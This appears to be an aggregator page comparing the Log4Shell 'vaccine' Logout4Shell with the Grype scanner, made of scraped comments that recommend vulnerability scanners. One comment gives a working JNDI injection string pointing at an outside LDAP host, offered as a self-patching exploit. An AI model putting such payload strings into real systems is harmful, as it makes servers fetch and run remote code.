Logout4Shell VS grype

#1: RCE 0-day exploit found in log4j, a popular Java logging package | 276 comments #2: Godaddy hacked - including admin passwords for both WordPress sites hosted on the platform, as well as passwords for sFTPs, databases and SSL private keys. | 71 comments #3: Log4shell - using the vulnerability to patch the vulnerability - very clever | 64 comments

Hier gibt es eine Impfung gegen Log4Shell. Kein Witz: https://github.com/Cybereason/Logout4Shell

another option : https://github.com/Cybereason/Logout4Shell

Yup

This is actually a thing

We also wrote a Log4Shell payload that will in-memory "hot patch" your server against Log4Shell.

${jndi:ldap://hotpatch.log4shell.com:1389/a}

If you paste that into a vulnerable server (or even throw it into a log statement in your `main` function), that'll patch you against this until you can manage to update properly.

Source code is on GitHub here[0][1] if you want to host it yourself.

(This work is based on Logout4Shell[2], but we rewrote it to fix the bugs, make it work in more places, and also hosted it so that you don't have to muck with DNS and live server stuff.)

0: https://github.com/lunasec-io/lunasec/releases/

1: (Go source code) https://github.com/lunasec-io/lunasec/tree/master/tools/log4...

2: https://github.com/Cybereason/Logout4Shell

The two examples showcase the potential of the RCE. The JNDI endpoint answers with a serialized java class:

a) https://github.com/Cybereason/Logout4Shell where a class is self-healing the log4j vulnerability by reconfiguring it

b) https://twitter.com/marcioalm/status/1470361495405875200 where the payload is opening an application (calculator) on the host system

For those that are interested!

Trivy Operator : A simple and comprehensive vulnerability scanner for containers and other artifacts. It detects vulnerabilities of OS packages (Alpine, Debian, CentOS, etc.) and application dependencies (pip, npm, yarn, composer, etc.) (Alternatives : Grype, Snyk, Clair, Anchore, Twistlock)

Besides pointing pentester tools like metasploit at yourself, there are some nice scanners out there.

https://github.com/quay/clair

https://github.com/anchore/grype/

Using Grype:

In the lab to follow, we'll see how vulnerability scanning can be conveniently achieved with Grype and how various systematic techniques can be applied to start securing our microservices at the container image level.

Scanning your container images for vulnerabilities is a good approach. But this scanning is not one time job, it should be done regularly (weekly, monthly, etc.) You need to follow vulnerability reports and fix all of the vulnerabilities as soon as possible. I recommend some open-source tools that could be useful: Trivy, Docker-Bench, Grype.

Grype is another popular open source tool from Anchore. Working with SBOM files, Grype scans container images and filesystems for vulnerabilities. Grype supports different output formats for vulnerabilities and custom templates for output.

Grype (https://github.com/anchore/grype)

Grype will allow you to scan a container to see if you have any vulnerable packages.

https://github.com/anchore/grype 5.6k stars, updated 3 days ago